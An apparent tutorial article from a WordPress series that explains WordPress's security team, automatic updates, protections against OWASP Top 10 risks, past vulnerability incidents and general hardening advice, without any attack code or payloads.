OMG / WordPress /

WordPress Security and Vulnerability

In this article of the series on WordPress, you’ll be acquainted with WordPress Security and Vulnerability issues. This article, in particular, analyzes, examines and explains WordPress core, themes and plugins for security risks and loopholes and major vulnerabilities.

You will also be familiar with security components and best practices to mitigate such risk factors.

WordPress Security

WordPress is a dynamic, reusable, extensible and community driven open source CMS that powers millions of websites on the Internet. The versatility and modularity made it the most popular choice for website building and maintaining.

Whether you are using WordPress or intending to do so, you should evaluate WordPress as a CMS and Application Framework from the perspectives presented here. Information pertaining to WordPress security concerns, discussed here in, are with respect to latest releases of WordPress and associated themes and plugins.

The fact that WordPress is open sourced, makes it doubled edged. In one edge, attackers, hackers and intruders study the open source of WordPress core, themes and plugins to discover security holes and wage attacks. On another, community people, behind the WordPress, study the loopholes and defend attacks.

Fortunately, at the end of every such attack, WordPress hardens its measures and become more and more resilient to such attacks.

WordPress Security Team

The WordPress Security Team comprises of some fifty security experts, developers and researchers including Automattic employees and individuals from round the globe.

The team identifies and resolves security issues in WordPress core. They also provide recommendations and documentations on best security practices to third party theme and plugin developers.

Often times, they work in collaboration with other external security teams.

WordPress Automated Updates for Security

Automated and unattended background updates for security releases was integrated in WordPress from version 3.7. The security updates are installed automatically requiring no manual intervention by the website owner or administrator. The updates take place once the WordPress Security Team identifies, fixes and pushes releases of security enhancements for WordPress.

Site owners may, if they intend so, opt out automated background security updates, by making a simple change in the WordPress configuration file to disable it.

However, it is strongly recommended by the WordPress Foundation and the Community to keep the feature enabled.

WordPress and OWASP (Open Web Application Security Project)

The online community initiative OWASP (Open Web Application Security Project) is dedicated to Web Application Security. OWASP Top 10 List identifies the most serious web application security loopholes.

WordPress addresses the OWASP Top 10 List of security concerns as follows:


WordPress has a set of API to validate and sanitize data and prevent unauthorized code injection. A complementary documentation on how to use these APIs is also available. The documentation emphasizes on how to validate and sanitize input and output data in HTML, URL and HTTP Headers as well as protect database and files.

Besides, you can restrict, via filters, the types of files that can be uploaded.

Broken Authentication and Session Management

To deal with broken authentication and session management, WordPress manages authentication and authorization itself. User ID, name, password credentials, email address, authentication cookies, session cookies and such other sensitive information are manage at server-side. WordPress protects passwords with salted and hashed encryptions. Used sessions are destroyed once the user logs out of the site.

XSS (Cross Site Scripting)

WordPress prevents XSS (Cross Site Scripting) by default. Administrators and editors on a Single-site WordPress Installation, and Network Administrators on a Multi-site WordPress Installations, collectively trusted users, can post unfiltered HTML or JavsScript inside the contents like pages and posts.

Any such script is stripped off, through the wp_kses function, from contents created or modified by untrusted users like contributors and authors.

Insecure Direct Object Reference

Though WordPress allows direct object referencing such as ID of user accounts, posts, pages, etc., but it has a rich permission and access control system to prevent unauthorized requests.

Security Misconfiguration Prevention

In WordPress, majority of security configurations and operations are available to one and only trusted user – the administrator. This ensures, your site will remain secure as long as you don’t share or leak your administrative password and compromise the default strength.

Sensitive Data Exposure

WordPress stores passwords using Salted Hashing Algorithms which is based on PHP. From WordPress version 3.7, password strength meter is included in the core. In addition, WordPress has options for requiring and setting HTTPS.

Missing Function Level Access Control

WordPress ensures proper authorization and permission for any function level access control as a precondition. Any unauthorized access to the administrative control panel areas is strictly prohibited to prevent unauthorized users doing harms.

CSRF (Cross Site Request Forgery)

To mitigate the risk factors of CSRF, WordPress uses cryptographic tokens, namely nonces. Nonces are unique and temporary tokens used to validate the intent of the HTTP Action Requests. Nonce tokens are short lived and usually limited to a specific user, action, object or time period. Nonces can be added to HTML Forms and URLs. It protects against potential CSRF threats.

WordPress provides necessary API to create and verify nonce tokens.

All nonces are invalidated on the event of logout.

Using Components with Known Vulnerabilities

Historically WordPress closely monitors and modifies some dependency open source projects that are used in the project. A cross-site vulnerability in TinyMCE was identified and fixed in WordPress version 3.5. WordPress replaced SWFUpload by Plupload in version 3.5.2. These are just examples of how WordPress decides to fork or replace critical external components.

Unvalidated Redirects and Forwards

WordPress internally protects against automatic redirects or attempts in other forms to direct users to unwanted destinations. This internal feature is made available for programming through the wp_safe_redirect function.

Further Security Risks and Concerns

WordPress address many other security risks and conerns. Discussing all of them are beyond the scope of our present series. Notable two concerns are:

Mitigating XXE (XML eXternal Entity) processing attacks

WordPress disables the loading of custom XML entities, when processing XML, to prevent both External Entity and Entity Expansion attacks.

Mitigating SSRF (Server Side Request Forgery) Attacks

In WordPress, access is only allowed to certain standard HTTP ports. Moreover, HTTP requests are filtered to prevent access to loopback and private IP addresses.


During the years of 2007 to 2015, many security issues have been reported and mitigated.

In 2007, AdSense was targeted and attacked with a WordPress exploit. A study in the same year reported that, 98% of WordPress websites are vulnerable to exploits. To mitigate the problem, WordPress came up with features like automated background updating.

In June 2013, some of the 50 most downloaded WordPress plugins were found vulnerable to attacks such as SQL injection and XSS.

In March 2015, Search Engine Land and many other security and SEO experts reported that, the Yoast SEO Plugin for WordPress has a vulnerability. Hackers can do Blind SQL Injections and exploit the vulnerability. At the time of the report, Yoast was being used by more than 14,000,000 WordPress websites worldwide. In response to the report, Yoast immediately released a newer version to fix the loophole and mitigate the security lapse.

In January 2017, Sucuri identified a vulnerability in WordPress. According to the security auditors at Sucuri, the vulnerability in the WordPress REST API would allow any unauthenticated user to modify posts and pages running WordPress 4.7 or later. Upon being secretly notified by Sucuri, WordPress developers, within a week or so, released version 4.7.2 including a patch that addressed the problem.

Common WordPress Security Measures

In general, WordPress websites can be protected with security plugins.

To stay safe and secured, download and install WordPress, themes and plugins from authentic sources. Keep installed WordPress, themes and plugins always updated. This ensures - you protect your WordPress website with minimal efforts.

On Apache Web Server, you can edit the .htaccess configuration file to prevent many types of attacks. Using the file, you can also block unauthorized access.

If hosting servers are at your own premises, or your hosting provider allows, use PHP version 7.4 or later.

There are many tools, to analyze vulnerabilities, like WPScan, WordPress Auditor and WordPress Sploit Framework that you can use on your WordPress website to analyze vulnerabilities like CSRF, LFI, RFI, XSS, SQL Injection and User Enumeration.

Keep Leading Your Followers!
Share it for them.